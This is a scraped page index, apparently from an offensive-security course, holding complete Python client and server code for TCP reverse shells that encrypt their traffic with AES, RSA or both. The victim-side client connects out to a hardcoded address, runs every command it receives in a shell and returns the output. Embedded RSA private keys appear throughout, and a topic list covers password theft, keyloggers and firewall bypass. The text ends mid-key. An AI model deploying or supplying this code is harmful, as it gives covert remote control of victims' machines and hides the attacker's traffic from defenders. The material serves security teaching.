              import subprocess\nimport socket\nfrom Cryptodome.Cipher import PKCS1_OAEP\nfrom Cryptodome.PublicKey import RSA\nfrom Cryptodome.Cipher import AES\nfrom Cryptodome.Util import Padding\n\nIV = b\"H\" * 16\n\ndef GET_AES(cipher):\n    privatekey = '''-----BEGIN RSA PRIVATE KEY-----\n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\n-----END RSA PRIVATE 
KEY-----'''\n    private_key = RSA.importKey(privatekey)\n    decryptor = PKCS1_OAEP.new(private_key)\n    return decryptor.decrypt(cipher).decode()\n\n\ndef encrypt(message):\n    encryptor = AES.new(AES_KEY, AES.MODE_CBC, IV)\n    padded_message = Padding.pad(message, 16)\n    encrypted_message = encryptor.encrypt(padded_message)\n    return encrypted_message\n\ndef decrypt(cipher):\n    decryptor = AES.new(AES_KEY, AES.MODE_CBC, IV)\n    decrypted_padded_message = decryptor.decrypt(cipher)\n    decrypted_message = Padding.unpad(decrypted_padded_message,\n                                      16)\n    return decrypted_message\n\n\ndef connect():\n    s = socket.socket()\n    s.connect(('192.168.0.152', 8080))\n    global AES_KEY\n    AES_KEY = s.recv(1024)\n    AES_KEY = GET_AES(AES_KEY)\n    AES_KEY = AES_KEY.encode()\n    print(AES_KEY)\n\n    while True:\n        command = s.recv(1024)\n\n        command = decrypt(command).decode()\n        print (command)\n        if 'terminate' in command:\n            s.close()\n            break\n        else:\n            CMD = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE, stdin=subprocess.PIPE)\n            result = CMD.stdout.read()\n            s.send(encrypt(result))\nconnect()\n
              ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes","rsa"]},{"location":"python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#server-side","title":"Server side","text":"
              import socket\nfrom Cryptodome.PublicKey import RSA\nfrom Cryptodome.Cipher import PKCS1_OAEP\nfrom Cryptodome.Cipher import AES\nfrom Cryptodome.Util import Padding\nimport string\nimport random\n\nIV = b\"H\" * 16\n\n\nkey = ''.join(random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits + '^!\\$%&/()=?{[]}+~#-_.:,;<>|\\\\') for _ in range(0, 32))\n\n\ndef SEND_AES(message):\n    publickey = '''-----BEGIN PUBLIC KEY-----\nMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAt9mjsBED9D/MYnU+W5+6\naP9SS1vgL9X6bThNkGKsZ5ZVfnoK4BxMBHI5Gi/YtoCJjyAGsWMpxy1fQ+F+ZWVA\nkwZDoQMWTrfZASHmQgB944PfGA7qfn15kDXmCyvzbitRyWvTs1LDDNF7Q/54Qj82\nh/85ibOPzQrpwQTjEAs8CJ14YWXAJnqOC6devaDYKdB7SSlueVtoQ8BxWc3hOJHJ\npvgZQ/6NixnICLIrFN0YbKZo4A0D3yRJIdumZw8uqwEMeIt41ja6zOG3gKtsG8su\nBZ/MvqX0WgojWr6hNs1Q8h3LtiSsPiUP/bTWD9zos8Yr7RuEabesjHlY0qcNzZ/Y\ngKXdgxUkCikTjRon6Mvh7iWKAtEilQlDeBYMGUvFUQ5FMF5LZJ5Q/7+JXulv8Whq\nKTp4dGpB3kUWuN+ltxBr+IYPhpBfMcR97W+NuXDReUiIGFJpVI1m4AeCzz1BdAM7\nU928DcglK6IowMmN4McyKuv49YYPd7TNFjJWc7P6e19V3BsxA5jpCc6Dxp5AM6WC\n0FqgSSOGVCIkcHT5wLcALyaXOaO0vhMgWWO233Of33wh/7oHclsc5r44MHlZrNSe\nX2QIHCFU4Mwp1hutIuIKkn5dLt1qmt2CDUO/uxGbdTf667c9TLYcYWoi/eDBdrVx\n7CkYI7g81RdcB6jGgbr9W4kCAwEAAQ==\n-----END PUBLIC KEY-----'''\n    public_key = RSA.importKey(publickey)\n    encryptor = PKCS1_OAEP.new(public_key)\n    encryptedData = encryptor.encrypt(message)\n    return encryptedData\n\n\n\n\ndef encrypt(message):\n    encryptor = AES.new(key.encode(), AES.MODE_CBC, IV)\n    padded_message = Padding.pad(message, 16)\n    encrypted_message = encryptor.encrypt(padded_message)\n    return encrypted_message\n\ndef decrypt(cipher):\n    decryptor = AES.new(key.encode(), AES.MODE_CBC, IV)\n    decrypted_padded_message = decryptor.decrypt(cipher)\n    decrypted_message = Padding.unpad(decrypted_padded_message,\n                                      16)\n    return decrypted_message\n\n\ndef connect():\n    s = socket.socket()\n    s.bind(('192.168.0.152', 8080))\n    s.listen(1)\n    print('[+] Listening for incoming TCP connection on port 8080')\n\n    conn, addr = s.accept()\n    print(key.encode())\n    conn.send(SEND_AES(key.encode()))\n\n    while True:\n        store = ''\n        command = input(\"Shell> \")\n        if 'terminate' in command:\n            conn.send('terminate'.encode())\n            conn.close()\n            break\n        else:\n            command = encrypt(command.encode())\n            conn.send(command)\n            result = conn.recv(1024)\n            try:\n                print(decrypt(result).decode())\n            except:\n                print(\"[-] unable to decrypt/receive data!\")\n\nconnect()\n
              ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes","rsa"]},{"location":"python/tcp-reverse-shell-with-rsa-encryption/","title":"TCP reverse shell with RSA encryption","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              • Gaining persistence shells (TCP + HTTP):
                • Coding a TCP connection and a reverse shell.
                • Coding a low level data exfiltration - TCP connection.
                • Coding an http reverse shell.
                • Coding a data exfiltration script for a http shell.
                • Tuning the connection attempts.
                • Including cd command into TCP reverse shell.
              • Advanced scriptable shells:
                • Using a Dynamic DNS instead of your bare attacker public IP.
                • Making your binary persistent.
                • Making a screenshot.
                • Coding a reverse shell that searches files.
              • Techniques for bypassing filters:
                • Coding a reverse shell that scans ports.
                • Hijack the Internet Explorer process to bypass a host-based firewall.
                • Bypassing Next Generation Firewalls.
                • Bypassing IPS with handmade XOR Encryption.
              • Malware and cryptography:
                • TCP reverse shell with AES encryption.
                • TCP reverse shell with RSA encryption.
                • TCP reverse shell with hybrid encryption AES + RSA.
              • Password Hijacking:
                • Simple keylogger in python.
                • Hijacking KeePass Password Manager.
                • Dumping saved passwords from Google Chrome.
                • Man in the browser attack.
                • DNS Poisoning.
              • Privilege escalation:
                • Weak service file permission.

              First, we generate a pair of keys (private and public) on the client side (victim's machine) and another pair on the server side (attacker's machine).

              ","tags":["python","python pentesting","scripting","reverse shell","encryption","rsa"]},{"location":"python/tcp-reverse-shell-with-rsa-encryption/#gen-keys","title":"Gen keys","text":"
              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nfrom Cryptodome.PublicKey import RSA\n\nnew_key = RSA.generate(4096) # generate an RSA key that is 4096 bits long\n\n# Export the key in PEM format; PEM files are ASCII-encoded\npublic_key = new_key.publickey().exportKey(\"PEM\")\nprivate_key = new_key.export_key(\"PEM\")\n\npublic_key_file = open(\"public.pem\", \"wb\")\npublic_key_file.write(public_key)\npublic_key_file.close()\n\nprivate_key_file = open(\"private.pem\", \"wb\")\nprivate_key_file.write(private_key)\nprivate_key_file.close()\n\nprint(public_key.decode())\nprint(private_key.decode())\n
              ","tags":["python","python pentesting","scripting","reverse shell","encryption","rsa"]},{"location":"python/tcp-reverse-shell-with-rsa-encryption/#rsa-client-side-shell","title":"RSA client side shell","text":"
              import subprocess\nimport socket\nfrom Cryptodome.Cipher import PKCS1_OAEP\nfrom Cryptodome.PublicKey import RSA\ndef decrypt(cipher):\n    privatekey = '''-----BEGIN RSA PRIVATE KEY-----\n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\n-----END RSA PRIVATE KEY-----'''\n    private_key = RSA.importKey(privatekey)\n    decryptor = 
PKCS1_OAEP.new(private_key)\n    return decryptor.decrypt(cipher).decode()\n\ndef encrypt(message):\n    publickey = '''-----BEGIN PUBLIC KEY-----\nMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEApceMHQ9c5Cdf+qgd4ASP\nM7WNbKavEwat78bMHQVK6cRNm2XSWCLpTsYN2eUALV++dYi2Im0T92bqYojRm+p4\nvVKOvrdmcmfnITEw/++pbvGZYRf2y0zsSJi1Mi+lfgQs56QXBMIU6IdeCL2C7cex\n9LNJ98ipGeN6nBiaExI9he3PcivztD5vHowCwkbzAnpZgPamrN10/KukWKvJ3t05\nbc0MskjkhVaaN55eidzAXUmYmxyoLeke1GssiU+TInZQXbSiUeeFsZpkMjYX4nCS\nxT/TuuFaDy6tfpfM+ePNEgeLjn7WAJh2ApxaYhmqwbDTsXd0ldHc4iNeGmlaEGE9\nDgXPSp7ljV9SZ7eO9LZuiERz003NrUqSKSHdYgEIH8wZrCiKSP471oNYn0ye+KdV\n/v25dqTXApO3QO/LZrJQ8twQyASR1LB3tTVYGuNpRVLlNC4j4ivL22uDCbGOIBOa\nKDmu/QR5imLdjj3alVg69Ci3It3jTlubtHDaXTVs+i1133fOKMnRPLmCHE1/6MMS\ni1BzDF46Q2XJwjgDnH5rk70n7sVquQtpHZkpQsuSSrjiL9Bi3jYghReVfFHC7aNF\np42v7EMaLohpnFm6yKiEm5UacMs7rLdnUQtAKo3r5UiNAegY6h/ZDncGhah1e5wF\ndBPIb9wJyTjPYTiTJ3rDQGECAwEAAQ==\n-----END PUBLIC KEY-----'''\n    public_key = RSA.importKey(publickey)\n    encryptor = PKCS1_OAEP.new(public_key)\n    encryptedData = encryptor.encrypt(message)\n    return encryptedData\n\ndef connect():\n    s = socket.socket()\n    s.connect(('192.168.0.152', 8080))\n    while True:\n        command = s.recv(1024)\n\n        command = decrypt(command)\n        print (command)\n        if 'terminate' in command:\n            s.close()\n            break\n        else:\n            CMD = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE, stdin=subprocess.PIPE)\n            result = CMD.stdout.read()\n            print (len(result))\n            if len(result) > 470:\n                for i in range(0, len(result), 470):\n                    chunk = result[0+i:470+i]\n                    s.send(encrypt(chunk))\n            else:\n                s.send(encrypt(result))\nconnect()\n
              ","tags":["python","python pentesting","scripting","reverse shell","encryption","rsa"]},{"location":"python/tcp-reverse-shell-with-rsa-encryption/#rsa-enc-big-message","title":"RSA Enc Big Message","text":"
              from Cryptodome.PublicKey import RSA\nfrom Cryptodome.Cipher import PKCS1_OAEP\n\ndef decrypt(cipher):\n    privatekey = open(\"private.pem\", \"rb\")\n    private_key = RSA.importKey(privatekey.read())\n    decryptor = PKCS1_OAEP.new(private_key)\n    print (decryptor.decrypt(cipher).decode())\n\n\ndef encrypt(message):\n    publickey = open(\"public.pem\", \"rb\")\n    public_key = RSA.importKey(publickey.read())\n    encryptor = PKCS1_OAEP.new(public_key)\n    encrypted_data = encryptor.encrypt(message)\n    print(encrypted_data)\n    decrypt(encrypted_data)\n\nmessage = 'H'*500\n\nif len(message) > 470: # To check the size limitation of messages, which is 470 bytes when the key size is 4096 bits\n    for i in range(0, len(message), 470): # We split the message into chunks so it can be processed\n        chunk = message[0+i:470+i]\n        encrypt(chunk.encode())\nelse:\n    encrypt(message.encode())\n
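
              Where does the 470-byte cap come from? A quick check, assuming PKCS1_OAEP's default SHA-1 hash: OAEP can encrypt at most the modulus size minus twice the hash length minus two bytes.

              k = 4096 // 8             # modulus size in bytes for a 4096-bit key\nh_len = 20                # SHA-1 digest size, the default hash of PKCS1_OAEP\nprint(k - 2 * h_len - 2)  # 470 -> max plaintext bytes per encrypt() call\n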
              ","tags":["python","python pentesting","scripting","reverse shell","encryption","rsa"]},{"location":"python/tcp-reverse-shell-with-rsa-encryption/#rsa-enc-small-messages","title":"RSA Enc Small messages","text":"
              from Cryptodome.PublicKey import RSA\nfrom Cryptodome.Cipher import PKCS1_OAEP\n\ndef encrypt(message):\n    publickey = open(\"public.pem\", \"rb\")\n    public_key = RSA.importKey(publickey.read())\n    encryptor = PKCS1_OAEP.new(public_key)\n    encrypted_data = encryptor.encrypt(message)\n    print(encrypted_data)\n    return encrypted_data\n\nmessage = 'H'*470 # Limitation on size of the clear text message is 470 bytes with a key size of 4096 bits\nencrypted_data = encrypt(message.encode())\n\n\ndef decrypt(cipher):\n    privatekey = open(\"private.pem\", \"rb\")\n    private_key = RSA.importKey(privatekey.read())\n    decryptor = PKCS1_OAEP.new(private_key)\n    print (decryptor.decrypt(cipher).decode())\n\ndecrypt(encrypted_data)\n
              ","tags":["python","python pentesting","scripting","reverse shell","encryption","rsa"]},{"location":"python/tcp-reverse-shell-with-rsa-encryption/#rsa-server-side-shell","title":"RSA Server side shell","text":"
              import socket\nfrom Cryptodome.PublicKey import RSA\nfrom Cryptodome.Cipher import PKCS1_OAEP\n\ndef encrypt(message):\n    publickey = '''-----BEGIN PUBLIC KEY-----\nMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAt9mjsBED9D/MYnU+W5+6\naP9SS1vgL9X6bThNkGKsZ5ZVfnoK4BxMBHI5Gi/YtoCJjyAGsWMpxy1fQ+F+ZWVA\nkwZDoQMWTrfZASHmQgB944PfGA7qfn15kDXmCyvzbitRyWvTs1LDDNF7Q/54Qj82\nh/85ibOPzQrpwQTjEAs8CJ14YWXAJnqOC6devaDYKdB7SSlueVtoQ8BxWc3hOJHJ\npvgZQ/6NixnICLIrFN0YbKZo4A0D3yRJIdumZw8uqwEMeIt41ja6zOG3gKtsG8su\nBZ/MvqX0WgojWr6hNs1Q8h3LtiSsPiUP/bTWD9zos8Yr7RuEabesjHlY0qcNzZ/Y\ngKXdgxUkCikTjRon6Mvh7iWKAtEilQlDeBYMGUvFUQ5FMF5LZJ5Q/7+JXulv8Whq\nKTp4dGpB3kUWuN+ltxBr+IYPhpBfMcR97W+NuXDReUiIGFJpVI1m4AeCzz1BdAM7\nU928DcglK6IowMmN4McyKuv49YYPd7TNFjJWc7P6e19V3BsxA5jpCc6Dxp5AM6WC\n0FqgSSOGVCIkcHT5wLcALyaXOaO0vhMgWWO233Of33wh/7oHclsc5r44MHlZrNSe\nX2QIHCFU4Mwp1hutIuIKkn5dLt1qmt2CDUO/uxGbdTf667c9TLYcYWoi/eDBdrVx\n7CkYI7g81RdcB6jGgbr9W4kCAwEAAQ==\n-----END PUBLIC KEY-----'''\n    public_key = RSA.importKey(publickey)\n    encryptor = PKCS1_OAEP.new(public_key)\n    encryptedData = encryptor.encrypt(message)\n    return encryptedData\n\ndef decrypt(cipher):\n    privatekey = '''-----BEGIN RSA PRIVATE KEY-----\nMIIJKQIBAAKCAgEApceMHQ9c5Cdf+qgd4ASPM7WNbKavEwat78bMHQVK6cRNm2XS\nWCLpTsYN2eUALV++dYi2Im0T92bqYojRm+p4vVKOvrdmcmfnITEw/++pbvGZYRf2\ny0zsSJi1Mi+lfgQs56QXBMIU6IdeCL2C7cex9LNJ98ipGeN6nBiaExI9he3Pcivz\ntD5vHowCwkbzAnpZgPamrN10/KukWKvJ3t05bc0MskjkhVaaN55eidzAXUmYmxyo\nLeke1GssiU+TInZQXbSiUeeFsZpkMjYX4nCSxT/TuuFaDy6tfpfM+ePNEgeLjn7W\nAJh2ApxaYhmqwbDTsXd0ldHc4iNeGmlaEGE9DgXPSp7ljV9SZ7eO9LZuiERz003N\nrUqSKSHdYgEIH8wZrCiKSP471oNYn0ye+KdV/v25dqTXApO3QO/LZrJQ8twQyASR\n1LB3tTVYGuNpRVLlNC4j4ivL22uDCbGOIBOaKDmu/QR5imLdjj3alVg69Ci3It3j\nTlubtHDaXTVs+i1133fOKMnRPLmCHE1/6MMSi1BzDF46Q2XJwjgDnH5rk70n7sVq\nuQtpHZkpQsuSSrjiL9Bi3jYghReVfFHC7aNFp42v7EMaLohpnFm6yKiEm5UacMs7\nrLdnUQtAKo3r5UiNAegY6h/ZDncGhah1e5wFdBPIb9wJyTjPYTiTJ3rDQGECAwEA\nAQKCAgAIWpZiboBBVQSepnMe80veELOIOpwO6uK/9vYZLkeYoRZCEu73FwdHu24+\nQS5xmuYHmTSIZpO/f1WnUnqxjy63Z54e2TIV6Mt6Xja4ZvTUTONsQ59hnkY34E4d\nMc52m7JBmAC68ibIku23pgkff1Ul3hUHofp3fgGTNSAqftxPz+yItdNJjW3fDbIj\n5RxgzxaMi6FZi61WADY/a6S4ENDQiikuIMM3PuZ1kAr2ioO9D7TbeCW3boxpqt7r\nKnHhJjIljrExTGfty7hp2VT5ya9ztiQuwiVeJ32BqBehrguK8YtkSlrxW71yoztg\nvydeLFF2m2zqEdG+KYcX8KAjvCqt4ctK2V49q1FplqBuSMODRbucy36FMfEFGRHK\nUc6qIWfQcZTuv1fJuq+8hYOYYcAEN/z6usF3KMTz1Qbk2qN01GAf8XcCjm3a56cc\nnPWZp+1jYoPSvhU4XHiUb8iUqXGloX4NkkxmvFFtRtt/eE/ELypdLRpK8hkMACwI\ntB4yoTZNm2wKAGC78IyLrgJDO/sBhA9uhWhoAVwX8Baou0HhYt2fvkl4rTR2e2rV\nQTfwDTiOI5N/ETlFEVDLw2b9mBGtrvjnMVtSM/CztC+cswVu+rFGAYMemXjmBfUM\nNHkeV2jRvafTvd7bz4Pm5CqOyi3LIxR0gb5YVIx/6bJ67W19+wKCAQEAtcyBmJO5\nToWebIU1afPOmkUTlfF8wPDLq3Ww8hn2KLD8AsiN7by3WJePMrnbKxMpBupFa/Rg\ncRru84De31Y4vaxrxEh3ZiWwmn/sOXUFcDC4FtQGFN/4lNQ4wvb6UPRsYpgNuWWS\n1Y8UhofeIWbo0fyP9nfB4juUYCGAngPN2gj6iogC33SVaBwqPKMQC4lFHjnfdDoZ\n6G7NzSFpkslneOnLDrfZTqCiJa9Awjt6u/wpmeTdwnW9VC6abDNOeFzVP3+6/DOU\nExXdspWFVpI9QV/uYW6m0wFiC1KBGBAVmXYIZLVHBw0emgPbetlsCpFn7lAHS